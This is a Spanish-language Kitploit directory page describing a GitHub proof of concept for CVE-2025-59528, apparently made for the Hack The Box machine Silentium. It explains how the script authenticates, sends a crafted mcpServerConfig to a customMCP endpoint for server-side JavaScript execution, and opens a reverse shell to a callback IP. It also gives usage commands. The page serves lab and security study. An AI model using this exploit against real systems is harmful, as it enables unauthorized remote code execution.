Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-59528-PoC — PoC para CVE-2025-59528 utilizado para lograr la ejecución remota de código en la máquina Silentium en HTB | Kitploit
Herramientas/GitHubGitHub/loaxert/cve-2025-59528-poc
ExplotaciónExplotación de Aplicaciones WebPruebas de Seguridad de APIsPruebas de PenetraciónAprendizaje y EducaciónDesarrollo de Payloads
GitHubloaxert/cve-2025-59528-poc

CVE-2025-59528-PoC

PoC para CVE-2025-59528 utilizado para lograr la ejecución remota de código en la máquina Silentium en HTB

Ver Repositorio
17hace 1 mesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

PoC educativo CVE-2025-59528

Solo uso educativo. Este proyecto está destinado a investigación de seguridad controlada, demostraciones en clase y pruebas autorizadas en un laboratorio aislado. No lo utilices contra sistemas, redes, aplicaciones o cuentas que no poseas o para las que no tengas permiso explícito de prueba.

Qué demuestra este PoC

Esta prueba de concepto demuestra cómo un valor mcpServerConfig manejado incorrectamente puede permitir la evaluación de JavaScript en el lado del servidor y la ejecución de comandos a través de la funcionalidad de carga de nodos customMCP.

El script admite dos métodos de autenticación:

  • Correo electrónico/contraseña: autentica a través del endpoint de inicio de sesión de la aplicación y reutiliza las cookies de sesión devueltas.
  • Token Bearer: envía una clave de API en la cabecera Authorization.

Después de la autenticación, el script envía una configuración manipulada a /api/v1/node-load-method/customMCP. El payload utiliza la funcionalidad de procesos hijos de Node.js para ejecutar un comando de shell y conectarse de vuelta a un listener controlado por el investigador. Este comportamiento se incluye únicamente para demostrar el impacto potencial en un entorno de laboratorio autorizado.

Requisitos

  • Python 3.
  • El paquete requests.

Instala la dependencia con:

root@kitploit:~
python3 -m pip install requests

Uso

Guarda el script como CVE-2025-59528.py.

Modo correo electrónico y contraseña

root@kitploit:~
python3 CVE-2025-59528.py <email> <password> <target-host> <callback-ip> <callback-port>

Ejemplo con valores solo para documentación:

root@kitploit:~
python3 CVE-2025-59528.py [email protected] 'REDACTED_PASSWORD' lab.example.test 192.0.2.10 4444

Modo token Bearer

root@kitploit:~
python3 CVE-2025-59528.py <api-key> <target-host> <callback-ip> <callback-port>

Ejemplo con valores solo para documentación:

root@kitploit:~
python3 CVE-2025-59528.py 'REDACTED_API_KEY' lab.example.test 192.0.2.10 4444

El script espera que estas rutas de la aplicación estén disponibles:

  • /api/v1/auth/login
  • /api/v1/node-load-method/customMCP

El script actual construye URLs http://. Actualiza la implementación para HTTPS cuando pruebes un despliegue de laboratorio que requiera TLS.

Cómo funciona el código

  1. main() valida el número de argumentos de la línea de comandos y selecciona el modo de autenticación.
  2. login() envía las credenciales proporcionadas al endpoint de inicio de sesión.
  3. tokens() extrae los valores de sesión de la cabecera de respuesta Set-Cookie.
  4. shell() construye la solicitud autenticada y envía el valor manipulado mcpServerConfig.
  5. bearer() realiza la misma solicitud usando un token Bearer en lugar de cookies de sesión.
  6. El cuerpo de la respuesta se imprime para que el investigador pueda correlacionar el resultado con los registros de la aplicación y del servidor.
Descargar herramienta